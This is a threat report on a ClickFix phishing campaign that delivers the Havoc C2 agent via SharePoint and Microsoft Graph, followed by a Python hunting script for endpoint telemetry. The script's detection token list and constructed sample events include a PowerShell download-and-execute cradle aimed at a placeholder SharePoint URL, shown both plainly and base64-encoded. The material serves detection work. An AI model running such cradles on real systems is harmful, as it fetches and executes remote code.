ClickFix Deception: Hackers Use SharePoint and Graph API to Deploy Havoc Malware

Amber | Attack Report

A recently discovered ClickFix phishing campaign lures victims into pasting and running a malicious PowerShell command, which ultimately deploys the Havoc command-and-control framework to establish remote access on the compromised device. Havoc is open source and available on GitHub, so attackers can freely modify its code and rebuild the agent, which helps the resulting binaries evade signature-based detection. To hide the delivery chain, the threat actors host each infection stage on a SharePoint site, and the final payload is a modified Havoc Demon agent that communicates through the Microsoft Graph API, so its traffic blends in with legitimate Microsoft 365 use. Once the agent is running, the attackers have full control over the infected system and can carry out further actions while staying under the radar. For defenders, the chain still leaves distinctive telemetry: PowerShell spawned from explorer.exe after a Run-dialog paste, and processes other than Office or browser clients talking to sharepoint.com or graph.microsoft.com.
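The chain described above can be hunted for in endpoint telemetry. The following is an added example written for this page, not code from the original report or from the Havoc project: it scans Sysmon-style process-creation (EventID 1) and network-connection (EventID 3) events for the ClickFix signals (PowerShell launched from explorer.exe, download-cradle switches, an -EncodedCommand blob that it decodes and inspects, and Graph/SharePoint traffic from an unexpected process). The key=value event format, the field names, the allow list of expected Microsoft 365 clients and every sample event are constructed for illustration; the SharePoint URL is a made-up placeholder.

```python
"""Hunt for the ClickFix -> PowerShell -> SharePoint/Graph API chain.

Added example, not code from the original report or the Havoc project.
The key=value event format, field names, allow list and all sample events
below are constructed for illustration.
"""
import base64
import ntpath
import re
from typing import Dict, List

# Switches and cmdlets typical of a download cradle pasted into the Run dialog.
CRADLE_TOKENS = (
    "-enc", "-encodedcommand", "-w hidden", "-windowstyle hidden", "-nop",
    "-noprofile", "-ep bypass", "-executionpolicy bypass", "iex",
    "invoke-expression", "downloadstring", "invoke-webrequest", "irm ", "iwr ",
)
# Parents that should not launch a PowerShell cradle; explorer.exe is the parent
# when the victim pastes the lure's command into Win+R.
SUSPICIOUS_PARENTS = {"explorer.exe", "mshta.exe", "wscript.exe", "cscript.exe"}
MS_CLOUD_HOST = re.compile(r"sharepoint\.com|graph\.microsoft\.com", re.I)
# Processes expected to talk to Graph/SharePoint (assumed allow list for this example).
EXPECTED_CLOUD_CLIENTS = {"outlook.exe", "teams.exe", "ms-teams.exe", "onedrive.exe",
                          "msedge.exe", "chrome.exe", "winword.exe", "excel.exe"}
FIELD_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')
# -e / -enc / -EncodedCommand followed by the base64 blob; base64 is case
# sensitive, so this runs on the original command line, not a lowercased copy.
ENC_RE = re.compile(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]{8,})", re.I)


def parse_event(line: str) -> Dict[str, str]:
    """Parse one 'key=value key="quoted value"' line into a dict."""
    return {m.group(1): m.group(2) if m.group(2) is not None else m.group(3)
            for m in FIELD_RE.finditer(line)}


def decode_encoded_command(cmd: str) -> str:
    """Return the plaintext of an -EncodedCommand blob (UTF-16LE base64), or ''."""
    m = ENC_RE.search(cmd)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except ValueError:  # bad padding or not valid UTF-16: treat as not encoded
        return ""


def encode_ps(command: str) -> str:
    """Encode a command the way 'powershell -EncodedCommand' expects it."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


def process_reasons(ev: Dict[str, str]) -> List[str]:
    """Signals for a process-creation event; alert only when two or more line up."""
    image = ntpath.basename(ev.get("Image", "")).lower()
    if image not in {"powershell.exe", "pwsh.exe"}:
        return []
    parent = ntpath.basename(ev.get("ParentImage", "")).lower()
    cmd = ev.get("CommandLine", "")
    text = (cmd + " " + decode_encoded_command(cmd)).lower()
    reasons = []
    if parent in SUSPICIOUS_PARENTS:
        reasons.append(f"powershell spawned by {parent}")
    hits = [t for t in CRADLE_TOKENS if t in text]
    if hits:
        reasons.append("download-cradle tokens: " + ", ".join(hits))
    if MS_CLOUD_HOST.search(text):
        reasons.append("stage fetched from a Microsoft cloud host")
    return reasons if len(reasons) >= 2 else []  # one signal alone is common admin noise


def network_reasons(ev: Dict[str, str]) -> List[str]:
    """Graph/SharePoint traffic from anything but the expected client apps."""
    image = ntpath.basename(ev.get("Image", "")).lower()
    host = ev.get("DestinationHostname", "")
    if MS_CLOUD_HOST.search(host) and image not in EXPECTED_CLOUD_CLIENTS:
        return [f"{image} connecting to {host} from an unexpected process"]
    return []


def hunt(lines: List[str]) -> List[Dict[str, object]]:
    """Return one finding per suspicious event, numbered from 1 in input order."""
    findings = []
    for n, line in enumerate(lines, start=1):
        ev = parse_event(line)
        check = {"1": process_reasons, "3": network_reasons}.get(ev.get("EventID"))
        reasons = check(ev) if check else []
        if reasons:
            findings.append({"event": n, "image": ntpath.basename(ev.get("Image", "")),
                             "reasons": reasons})
    return findings


# Constructed sample telemetry (paths, host names and URL are placeholders).
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EXPLORER = r"C:\Windows\explorer.exe"
STAGE_URL = "https://contoso.sharepoint.com/sites/it/stage1.txt"
CRADLE = f"iex (irm {STAGE_URL})"
SAMPLE_EVENTS = [
    f'EventID=1 Image={PS} ParentImage={EXPLORER} CommandLine="powershell"',            # 1 benign
    f'EventID=1 Image={PS} ParentImage={EXPLORER} CommandLine="powershell -w hidden -nop -c {CRADLE}"',
    f'EventID=1 Image={PS} ParentImage={EXPLORER} CommandLine="powershell -EncodedCommand {encode_ps(CRADLE)}"',
    rf'EventID=1 Image={PS} ParentImage=C:\Windows\System32\cmd.exe CommandLine="powershell -NoProfile -File C:\scripts\backup.ps1"',
    r'EventID=3 Image=C:\Users\bob\AppData\Local\Temp\svc.exe DestinationHostname=graph.microsoft.com',
    r'EventID=3 Image="C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE" DestinationHostname=graph.microsoft.com',
    f'EventID=3 Image={PS} DestinationHostname=contoso.sharepoint.com',
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"event {f['event']} ({f['image']}): " + "; ".join(f["reasons"]))
```

Events 2, 3, 5 and 7 are flagged; the plain `powershell` launch from Win+R and the scheduled backup script each carry only one weak signal and stay quiet, and Outlook's Graph traffic is on the allow list. In production the allow list would come from your own baseline, and the cradle tokens should be tuned against your administrators' scripts before the rule pages anyone.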